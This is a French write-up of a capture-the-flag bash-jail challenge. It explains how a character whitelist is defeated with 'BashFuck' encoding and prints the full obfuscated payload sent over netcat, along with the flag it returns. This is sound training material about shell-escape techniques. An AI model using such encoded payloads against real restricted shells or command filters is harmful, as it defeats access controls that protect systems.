Bash Jail Revenge

Catégorie: Système Difficulté: - Flag: CTFREI{b45h_j41l5_c4n_b3_w31rd_:0}

Challenge

470B

bashjail_revenge.zip

Description

Honteuse la Bash Jail d'avant...

Tente maintenant de faire quelque chose sur celle-là !

Connexion: nc intro.ctfrei.fr 4447

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Dans le script donné, à la ligne 8 la condition est :

all(char in allowed for char in code)

Cela nous oblige à n'utiliser que les caractères !#$'()<>\{}. Cela fait penser aux langages ésotériques comme le BrainFuck ou le JSFuck, qui consistent à n'écrire du code qu'avec un nombre limité de caractères.

Ça tombe bien, le BashFuck existe, et le site BashFuck Payload permet de convertir des commandes. Il suffit ensuite de choisir le payload qui correspond à notre charset autorisé :

$ nc intro.ctfrei.fr 4447
Bienvenue dans ma bash jail !
Essaie d'exéc une commande pour récupérer le flag si t'es chaud :p
>>> ${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\'
CTFREI{b45h_j41l5_c4n_b3_w31rd_:0}

PrécédentBash Jail SuivantBrokenBin

Mis à jour il y a 1 an

hashtagChallenge

hashtagDescription

hashtagSolution

Challenge

Description

Solution